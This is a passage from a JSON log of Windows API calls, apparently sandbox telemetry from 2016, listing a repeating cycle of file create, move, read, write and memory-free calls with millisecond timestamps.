"api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,209", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,209", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,209", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,209", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,219", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,219", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,219", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,219", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,219", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,219", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,219", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,219", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,229", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,229", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,229", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,229", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,229", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,229", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,229", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,229", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,239", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,239", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,239", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,239", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,239", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,239", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,239", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,239", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,249", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,249", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,249", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,249", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,249", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,249", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,249", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,259", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,259", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,259", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,259", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,269", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,269", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,269", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,269", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,269", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,279", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,279", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,279", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,279", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,279", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,279", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,279", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,279", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,289", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,289", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,289", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,289", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,289", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,289", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,289", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,289", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,299", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,299", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,299", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,299", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,299", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,299", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,309", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,309", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,309", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,309", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,309", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,309", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,319", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,319", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,319", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,319", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,319", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,319", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,319", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,339", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,339", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,339", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,339", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,339", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,349", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,349", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,349", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,349", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,349", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,349", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,359", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,359", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,359", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,359", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,359", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,369", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,369", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,369", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,369", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,369", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,379", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,379", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,379", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,379", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,379", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,379", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,379", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,379", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,389", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,389", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,389", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,389", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,389", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,389", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,389", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,399", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,399", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,399", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,399", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,399", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,399", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,409", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,409", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,409", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,409", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,409", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,409", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,409", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,419", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,419", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,419", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,419", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,419", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,419", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,419", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,429", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,429", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,429", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,429", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,429", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,429", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,429", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,429", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,439", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,439", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,439", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,439", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,439", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,439", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,439", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,439", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,449", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,449", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,449", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,449", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,449", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,449", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,449", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,449", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,459", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,459", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,459", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,459", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,459", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,459", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,459", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,459", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,469", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,469", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,469", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,469", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,469", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,469", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,469", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,469", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,479", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,479", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,479", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,479", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,479", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,479", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,479", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,479", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,489", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,489", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,489", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,489", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,489", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,499", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,499", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,499", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,499", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,499", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,499", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,499", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,499", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,509", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,509", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,509", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,509", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,509", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,509", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,509", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,509", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,519", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,519", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,519", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,519", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,519", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,519", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,519", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,519", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,529", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,529", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,529", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,529", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,529", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,529", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,529", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,529", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,539", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,539", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,539", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,539", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,539", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,539", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,539", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,539", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,549", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,549", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,549", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,549", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,549", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,549", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,549", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,549", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,559", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,559", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,559", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,559", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,559", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,559", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,559", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,559", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,569", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,569", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,569", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,569", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,569", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,569", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,569", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,569", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,579", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,579", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,579", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,579", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,579", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,579", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,579", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,579", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,589", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,589", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,589", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,589", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,589", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,589", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,589", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,589", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,589", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,589", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,589", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,599", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,599", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,599", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,599", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,599", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,599", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,599", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,599", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,609", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,609", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,609", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,609", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,609", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,629", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,629", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,629", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,629", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,629", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,629", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,629", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,639", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,639", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,639", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,639", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,639", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,639", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,639", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,639", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,639", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,649", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,649", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,649", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,649", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,649", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,649", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,649", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,649", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,659", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,659", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,659", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,659", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,659", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:00,659", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,659", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,659", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,659", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:00,659", "api": 